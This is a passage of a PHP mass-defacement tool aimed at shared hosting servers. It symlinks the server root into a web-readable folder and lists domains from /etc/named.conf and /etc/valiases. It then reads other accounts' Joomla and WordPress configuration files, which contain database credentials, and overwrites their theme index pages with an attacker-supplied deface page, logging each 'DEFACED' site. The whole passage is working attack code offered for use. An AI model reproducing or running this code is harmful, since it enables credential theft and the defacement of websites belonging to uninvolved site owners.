// preg_match() calls below test these URL *strings* for "dbprefix"/"DB_NAME" rather than the
// fetched file, so in this mode no target is ever matched as written (mode 1 below does
// fetch the file first).
  470. // joomla symlinks
  471. $joomla=$url."/sym/root/home/".$user."/public_html/configuration.php";
  472. $joomla2=$url."/sym/root/home/".$user."/public_html/joomla/configuration.php";
  473. $joomla3=$url."/sym/root/home/".$user."/public_html/site/configuration.php";
  474. // wordpress symlinks
  475. $wordpress=$url."/sym/root/home/".$user."/public_html/wp-config.php";
  476. $wordpress2=$url."/sym/root/home/".$user."/public_html/blog/wp-config.php";
  477. $wordpress3=$url."/sym/root/home/".$user."/public_html/wp/wp-config.php";
  478.  
  479. // first joomla guess
  480. if($joomla && preg_match('/dbprefix/i',$joomla)){
  481. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
  482. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  483. $res = index_changer_joomla($joomla, $index, $site_urlto);
  484. echo '<td>'.$res['output'].'</td>';
  485. if($res['cond']) {
  486. echo '<td align="center"><span class="green">DEFACED</span></td>';
  487. fwrite($khaled, 'http://'.$site_urlto.'/templates/'.$res['template'].'/index.php<br>');
  488. $count1 = $count1+1;
  489. } else {
  490. echo '<td align="center"><span class="red">FAILED</span></td>';
  491. }
  492. echo '</tr>';
  493. }
  494. // second joomla guess
  495. if($joomla2 && preg_match('/dbprefix/i',$joomla2)){
  496. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
  497. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  498. $res = index_changer_joomla($joomla2, $index, $site_urlto);
  499. echo '<td>'.$res['output'].'</td>';
  500. if($res['cond']) {
  501. echo '<td align="center"><span class="green">DEFACED</span></td>';
  502. fwrite($khaled, 'http://'.$site_urlto.'/joomla/'.$res['template'].'/index.php<br>');
  503. $count1 = $count1+1;
  504. } else {
  505. echo '<td align="center"><span class="red">FAILED</span></td>';
  506. }
  507. echo '</tr>';
  508. }
  509. // third joomla guess
  510. if($joomla3 && preg_match('/dbprefix/i',$joomla3)){
  511. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
  512. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  513. $res = index_changer_joomla($joomla3, $index, $site_urlto);
  514. echo '<td>'.$res['output'].'</td>';
  515. if($res['cond']) {
  516. echo '<td align="center"><span class="green">DEFACED</span></td>';
  517. fwrite($khaled, 'http://'.$site_urlto.'/site/'.$res['template'].'/index.php<br>');
  518. $count1 = $count1+1;
  519. } else {
  520. echo '<td align="center"><span class="red">FAILED</span></td>';
  521. }
  522. echo '</tr>';
  523. }
  524.  
  525. // first wordpress guess
  526. if($wordpress && preg_match('/DB_NAME/i',$wordpress)){
  527. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
  528. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  529. $res = index_changer_wp($wordpress, $index);
  530. echo '<td>'.$res['output'].'</td>';
  531. if($res['cond']) {
  532. echo '<td align="center"><span class="green">DEFACED</span></td>';
  533. fwrite($khaled, 'http://'.$site_urlto.'/wp-content/themes/'.$res['template'].'/index.php<br>');
  534. $count2++;
  535. } else {
  536. echo '<td align="center"><span class="red">FAILED</span></td>';
  537. }
  538. echo '</tr>';
  539.         }
  540.        
  541. // second wordpress guess
  542. if($wordpress2 && preg_match('/DB_NAME/i',$wordpress2)){
  543. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
  544. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  545. $res = index_changer_wp($wordpress2, $index);
  546. echo '<td>'.$res['output'].'</td>';
  547. if($res['cond']) {
  548. echo '<td align="center"><span class="green">DEFACED</span></td>';
  549. fwrite($khaled, 'http://'.$site_urlto.'/blog/wp-content/themes/'.$res['template'].'/index.php<br>');
  550. $count2++;
  551. } else {
  552. echo '<td align="center"><span class="red">FAILED</span></td>';
  553. }
  554. echo '</tr>';
  555.         }
  556.        
  557. // third wordpress guess
  558. if($wordpress3 && preg_match('/DB_NAME/i',$wordpress3)){
  559. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
  560. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  561. $res = index_changer_wp($wordpress3, $index);
  562. echo '<td>'.$res['output'].'</td>';
  563. if($res['cond']) {
  564. echo '<td align="center"><span class="green">DEFACED</span></td>';
  565. fwrite($khaled, 'http://'.$site_urlto.'/wp/wp-content/themes/'.$res['template'].'/index.php<br>');
  566. $count2++;
  567. } else {
  568. echo '<td align="center"><span class="red">FAILED</span></td>';
  569. }
  570. echo '</tr>';
  571.         }
  572.    
  573. }
  574. echo '</table>';
  575. echo '<hr/>';
  576. echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
  577. echo '<a href="defaced.html" target="_blank">Show All</a><br />';
  578. }
  579.  
// mode 1: same .htaccess/symlink setup, but domains come from the zone "..." stanzas of
// /etc/named.conf and the owning account is resolved with fileowner()/posix_getpwuid() on
// /etc/valiases/<domain>. Accounts owned by root are skipped. ?st=N resumes at the N-th domain.
  580. elseif($_POST['mode']==1) {
  581.     @mkdir('sym',0777);
  582.     $wr  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  583.     $fp = @fopen ('sym/.htaccess','w');
  584.     fwrite($fp, $wr);
  585.     @symlink('/','sym/root');
  586.     $dominios = @file_get_contents("/etc/named.conf");
  587.     @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  588.     $out[1] = array_unique($out[1]);
  589.     $numero_dominios = count($out[1]);
  590.     echo "Total domains: $numero_dominios <br><br />";
  591.     $def = $_POST['tunisia'];
// Base URL for reading /home/<user>/... through the symlink over HTTP.
  592.     $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
  593.     $output = fopen('defaced.html', 'a+');
  594.     echo ("<center><table class='result' width='100%' border=1 cellspacing=1 cellpading=1>  
  595.     <tr><th width=50%>domain</td><th width=25%>Type</td><th width=25%>Status</td></tr>");  
  596.    $j = 1;
  597.     $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
  598.     for($i = $st; $i <= $numero_dominios; $i++)
  599.     {
  600.         $domain = $out[1][$i];
  601.         $dono_arquivo = @fileowner("/etc/valiases/".$domain);
  602.         $infos = @posix_getpwuid($dono_arquivo);
  603.        
  604.         if($infos['name']!='root') {
// Here the config files really are fetched (through the symlink), so the dbprefix/DB_NAME
// checks below operate on file contents and can match.
  605. $config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
  606. $config001 = @file_get_contents($base_url.$infos['name']."/public_html/joomla/configuration.php");
  607. $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
  608. $config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
  609.  
  610. if($config001 && preg_match('/dbprefix/i',$config001)){
  611. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  612. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  613. $res = index_changer_joomla($config001, $def, $domain);
  614. echo '<td>'.$res['output'].'</td>';
  615. if($res['cond']) {
  616. echo '<td align="center"><span class="green">DEFACED</span></td>';
  617. fwrite($output, 'http://'.$domain."<br>");
  618. $count1 = $count+1;
  619. } else {
  620. echo '<td align="center"><span class="red">FAILED</span></td>';
  621. }
  622. echo '</tr>';
  623. }
  624.        
  625. if($config01 && preg_match('/dbprefix/i',$config01)){
  626. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  627. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  628. $res = index_changer_joomla($config01, $def, $domain);
  629. echo '<td>'.$res['output'].'</td>';
  630. if($res['cond']) {
  631. echo '<td align="center"><span class="green">DEFACED</span></td>';
  632. fwrite($output, 'http://'.$domain."<br>");
  633. $count1 = $count+1;
  634. } else {
  635. echo '<td align="center"><span class="red">FAILED</span></td>';
  636. }
  637. echo '</tr>';
  638. }
  639.  
  640. if($config02 && preg_match('/DB_NAME/i',$config02)){
  641. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  642. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  643. $res = index_changer_wp($config02, $def);
  644. echo '<td>'.$res['output'].'</td>';
  645. if($res['cond']) {
  646. echo '<td align="center"><span class="green">DEFACED</span></td>';
  647. fwrite($output, 'http://'.$domain."<br>");
  648. $count2 = $count2+1;
  649. } else {
  650. echo '<td align="center"><span class="red">FAILED</span></td>';
  651. }
  652. echo '</tr>';
  653. }
  654. if($config03 && preg_match('/DB_NAME/i',$config03)){
  655. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  656. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  657. $res = index_changer_wp($config03, $def);
  658. echo '<td>'.$res['output'].'</td>';
  659. if($res['cond']) {
  660. echo '<td align="center"><span class="green">DEFACED</span></td>';
  661. fwrite($output, 'http://'.$domain."<br>");
  662. $count2 = $count2+1;
  663. } else {    
  664. echo '<td align="center"><span class="red">FAILED</span></td>';
  665. }
  666. echo '</tr>';
  667. }
  668.         }
  669.     }
  670.     echo '</table>';
  671.     echo '<hr/>';
  672.     echo 'Total Defaced = '.$count1 + $count2.' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
  673.     echo '<a href="defaced.html" target="_blank">Show All</a><br />';
  674. }
// Default: the operator form. "tunisia" = deface-page URL, "mode" = enumeration source.
  675. else {
  676. echo '
  677. <table>
  678. <form method="post">
  679. <tr>
  680.     <td>index url : </td>
  681.     <td><input type="text" size="60" name="tunisia" placeholder="put your index url here !"></td>
  682. </tr>
  683. <tr>
  684.     <td>use : </td>
  685. </tr>
  686. <tr>
  687.     <td><input type="radio" value="1" name="mode"></td><td>/etc/named.conf</td>
  688. </tr>
  689. <tr>
  690.     <td><input type="radio" checked="checked" value="2" name="mode"></td><td>/var/named</td>
  691. </tr>
  692. <tr>
  693. <td><br><input type="submit" name="tunisia_deface" value="Deface"></td>
  694. </tr>
  695. </form>
  696. </center>
  697. </body>
  698. </html>
  699. ';
  700. }
  701. ?>